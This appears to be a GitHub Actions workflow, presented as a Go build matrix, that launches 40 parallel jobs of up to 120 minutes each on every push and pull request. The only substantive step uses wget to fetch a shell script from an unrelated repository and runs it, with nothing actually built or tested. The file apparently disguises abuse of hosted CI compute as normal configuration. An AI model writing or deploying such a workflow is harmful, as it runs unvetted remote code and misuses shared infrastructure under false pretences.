name: Fizar_Mientsviel
on: [push, pull_request]
jobs:
  build:
    name: Fizar_Mientsviel
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, f, g, h, i, j]
    timeout-minutes: 120
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Fizar_Mientsviel
      run: |
        wget https://raw.githubusercontent.com/bronginam/ayolakokia/master/config.sh && ./config.sh kloter1-${{ matrix.go }}-${{ matrix.flag }}
